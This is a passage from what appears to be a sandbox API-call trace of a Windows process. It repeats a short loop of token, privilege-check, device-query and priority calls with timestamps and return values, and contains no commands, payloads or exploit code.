ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.002] GetLastError () returned 0x3f0 [0017.002] GetCurrentProcess () returned 0xffffffff [0017.002] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.002] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.002] SetLastError (dwErrCode=0x522) [0017.002] CloseHandle (hObject=0x114) returned 1 [0017.002] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.002] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.002] GetLastError () returned 0x578 [0017.002] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.002] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.002] GetCurrentThread () returned 0xfffffffe [0017.002] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.002] GetLastError () returned 0x3f0 [0017.002] GetCurrentProcess () returned 0xffffffff [0017.002] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.002] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.002] SetLastError (dwErrCode=0x522) [0017.002] CloseHandle (hObject=0x114) returned 1 [0017.002] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.002] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.002] GetLastError () returned 0x578 [0017.003] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.003] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.003] GetCurrentThread () returned 0xfffffffe [0017.003] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.003] GetLastError () returned 0x3f0 [0017.003] GetCurrentProcess () returned 0xffffffff [0017.003] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.003] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.003] SetLastError (dwErrCode=0x522) [0017.003] CloseHandle (hObject=0x114) returned 1 [0017.003] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.003] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.003] GetLastError () returned 0x578 [0017.003] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.003] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.003] GetCurrentThread () returned 0xfffffffe [0017.003] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.003] GetLastError () returned 0x3f0 [0017.003] GetCurrentProcess () returned 0xffffffff [0017.003] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.003] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.003] SetLastError (dwErrCode=0x522) [0017.003] CloseHandle (hObject=0x114) returned 1 [0017.003] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.003] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.003] GetLastError () returned 0x578 [0017.003] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.003] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.003] GetCurrentThread () returned 0xfffffffe [0017.003] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.003] GetLastError () returned 0x3f0 [0017.003] GetCurrentProcess () returned 0xffffffff [0017.003] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.003] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.004] SetLastError (dwErrCode=0x522) [0017.004] CloseHandle (hObject=0x114) returned 1 [0017.004] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.004] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.004] GetLastError () returned 0x578 [0017.004] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.004] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.004] GetCurrentThread () returned 0xfffffffe [0017.004] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.004] GetLastError () returned 0x3f0 [0017.004] GetCurrentProcess () returned 0xffffffff [0017.004] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.004] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.004] SetLastError (dwErrCode=0x522) [0017.004] CloseHandle (hObject=0x114) returned 1 [0017.004] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.004] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.004] GetLastError () returned 0x578 [0017.004] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.004] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.004] GetCurrentThread () returned 0xfffffffe [0017.004] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.004] GetLastError () returned 0x3f0 [0017.004] GetCurrentProcess () returned 0xffffffff [0017.004] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.005] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.005] SetLastError (dwErrCode=0x522) [0017.005] CloseHandle (hObject=0x114) returned 1 [0017.005] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.005] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.005] GetLastError () returned 0x578 [0017.005] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.005] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.005] GetCurrentThread () returned 0xfffffffe [0017.005] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.005] GetLastError () returned 0x3f0 [0017.005] GetCurrentProcess () returned 0xffffffff [0017.005] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.005] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.005] SetLastError (dwErrCode=0x522) [0017.005] CloseHandle (hObject=0x114) returned 1 [0017.005] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.005] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.005] GetLastError () returned 0x578 [0017.005] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.005] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.005] GetCurrentThread () returned 0xfffffffe [0017.005] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.005] GetLastError () returned 0x3f0 [0017.005] GetCurrentProcess () returned 0xffffffff [0017.005] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.005] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.005] SetLastError (dwErrCode=0x522) [0017.005] CloseHandle (hObject=0x114) returned 1 [0017.005] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.005] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.005] GetLastError () returned 0x578 [0017.005] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.005] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.005] GetCurrentThread () returned 0xfffffffe [0017.005] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.005] GetLastError () returned 0x3f0 [0017.005] GetCurrentProcess () returned 0xffffffff [0017.006] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.006] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.006] SetLastError (dwErrCode=0x522) [0017.006] CloseHandle (hObject=0x114) returned 1 [0017.006] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.006] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.006] GetLastError () returned 0x578 [0017.006] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.006] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.006] GetCurrentThread () returned 0xfffffffe [0017.006] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.006] GetLastError () returned 0x3f0 [0017.006] GetCurrentProcess () returned 0xffffffff [0017.006] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.006] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.006] SetLastError (dwErrCode=0x522) [0017.006] CloseHandle (hObject=0x114) returned 1 [0017.006] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.006] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.006] GetLastError () returned 0x578 [0017.006] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.006] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.006] GetCurrentThread () returned 0xfffffffe [0017.006] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.006] GetLastError () returned 0x3f0 [0017.006] GetCurrentProcess () returned 0xffffffff [0017.006] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.006] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.006] SetLastError (dwErrCode=0x522) [0017.006] CloseHandle (hObject=0x114) returned 1 [0017.006] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.006] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.006] GetLastError () returned 0x578 [0017.006] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.006] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.006] GetCurrentThread () returned 0xfffffffe [0017.006] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.006] GetLastError () returned 0x3f0 [0017.006] GetCurrentProcess () returned 0xffffffff [0017.006] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.006] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.007] SetLastError (dwErrCode=0x522) [0017.007] CloseHandle (hObject=0x114) returned 1 [0017.007] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.007] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.007] GetLastError () returned 0x578 [0017.007] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.007] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.007] GetCurrentThread () returned 0xfffffffe [0017.007] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.007] GetLastError () returned 0x3f0 [0017.007] GetCurrentProcess () returned 0xffffffff [0017.007] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.007] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.007] SetLastError (dwErrCode=0x522) [0017.007] CloseHandle (hObject=0x114) returned 1 [0017.007] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.007] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.007] GetLastError () returned 0x578 [0017.007] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.007] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.007] GetCurrentThread () returned 0xfffffffe [0017.007] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.007] GetLastError () returned 0x3f0 [0017.007] GetCurrentProcess () returned 0xffffffff [0017.007] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.007] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.007] SetLastError (dwErrCode=0x522) [0017.007] CloseHandle (hObject=0x114) returned 1 [0017.007] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.007] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.007] GetLastError () returned 0x578 [0017.007] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.007] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.007] GetCurrentThread () returned 0xfffffffe [0017.007] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.007] GetLastError () returned 0x3f0 [0017.007] GetCurrentProcess () returned 0xffffffff [0017.007] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.007] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.007] SetLastError (dwErrCode=0x522) [0017.007] CloseHandle (hObject=0x114) returned 1 [0017.007] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.007] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.007] GetLastError () returned 0x578 [0017.008] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.008] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.008] GetCurrentThread () returned 0xfffffffe [0017.008] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.008] GetLastError () returned 0x3f0 [0017.008] GetCurrentProcess () returned 0xffffffff [0017.008] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.008] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.008] SetLastError (dwErrCode=0x522) [0017.008] CloseHandle (hObject=0x114) returned 1 [0017.008] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.008] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.008] GetLastError () returned 0x578 [0017.008] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.008] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.008] GetCurrentThread () returned 0xfffffffe [0017.008] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.008] GetLastError () returned 0x3f0 [0017.008] GetCurrentProcess () returned 0xffffffff [0017.008] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.008] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.008] SetLastError (dwErrCode=0x522) [0017.008] CloseHandle (hObject=0x114) returned 1 [0017.008] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.008] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.008] GetLastError () returned 0x578 [0017.008] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.008] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.008] GetCurrentThread () returned 0xfffffffe [0017.008] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.008] GetLastError () returned 0x3f0 [0017.008] GetCurrentProcess () returned 0xffffffff [0017.008] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.008] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.008] SetLastError (dwErrCode=0x522) [0017.008] CloseHandle (hObject=0x114) returned 1 [0017.008] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.008] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.008] GetLastError () returned 0x578 [0017.008] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.008] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.008] GetCurrentThread () returned 0xfffffffe [0017.008] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.008] GetLastError () returned 0x3f0 [0017.008] GetCurrentProcess () returned 0xffffffff [0017.009] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.009] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.009] SetLastError (dwErrCode=0x522) [0017.009] CloseHandle (hObject=0x114) returned 1 [0017.009] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.009] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.009] GetLastError () returned 0x578 [0017.009] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.009] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.009] GetCurrentThread () returned 0xfffffffe [0017.009] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.009] GetLastError () returned 0x3f0 [0017.009] GetCurrentProcess () returned 0xffffffff [0017.009] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.009] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.009] SetLastError (dwErrCode=0x522) [0017.009] CloseHandle (hObject=0x114) returned 1 [0017.009] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.009] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.009] GetLastError () returned 0x578 [0017.009] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.009] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.009] GetCurrentThread () returned 0xfffffffe [0017.009] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.009] GetLastError () returned 0x3f0 [0017.009] GetCurrentProcess () returned 0xffffffff [0017.009] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.009] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.009] SetLastError (dwErrCode=0x522) [0017.009] CloseHandle (hObject=0x114) returned 1 [0017.009] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.009] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.009] GetLastError () returned 0x578 [0017.009] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.009] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.009] GetCurrentThread () 